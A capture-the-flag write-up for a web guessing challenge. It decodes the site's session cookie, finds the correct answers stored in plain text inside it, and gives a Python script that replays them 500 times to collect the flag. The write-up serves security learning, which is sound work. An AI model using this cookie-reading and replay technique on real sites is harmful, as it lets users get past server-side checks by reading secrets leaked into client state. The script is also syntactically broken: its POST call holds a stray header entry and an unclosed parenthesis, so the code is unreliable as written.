
The page shows a random generated image with random generated file name every time refresh, for the first time visit it, a session value is set in cookie.

session: eyJhbnN3ZXIiOlsyNSwyMywxMyw5M10sImNvcnJlY3QiOjIsImltYWdlIjoiLi9zdGF0aWMvY2hhbGwtaW1hZ2VzL2lNdUx4T29DeUIuanBnIn0.YGrDwA.Vr2yoO58ay3OhDqhOd6xqLYa45c

Decode it with base64 we get key-value data, as the session value itself comes with some additional bytes at the end, might cause some parse issue. It seems answer is correct guess for image. Send it with , is not working and the guess count is reset to 0, but it works with space splitter.

base64 -d <<< eyJhbnN3ZXIiOlsyNSwyMywxMyw5M10sImNvcnJlY3QiOjIsImltYWdlIjoiLi9zdGF0aWMvY2hhbGwtaW1hZ2VzL2lNdUx4T29DeUIuanBnIn0.YGrDwA.Vr2yoO58ay3OhDqhOd6xqLYa45c
{"answer":[25,23,13,93],"correct":2,"image":"./static/chall-images/iMuLxOoCyB.jpg"}base64: invalid input

The session value is used for post requests. If the submitted data is correct, the correct guess count on page is increamented by 1. Every time we make a guess the session value in cookie changes, so we need to re-parse and use it for the next guess. We need to guess 500 times to meet the requirement.

remote = ""

def parse():
    sess = base64.decodebytes(rsp.cookies['session'].split('.')[0].encode()+b'==')
    ans = json.loads(sess)['answer']
    guess = ' '.join(map(str, json.loads(sess)['answer']))
    return guess

rsp = requests.get(remote)
guess = parse()

for i in range(1, 501):
    rsp = requests.post(remote,
            data={'guess': guess},
            'Content-Type': 'application/x-www-form-urlencoded',
    guess = parse()

After 500 correct guess, we get the flag in response.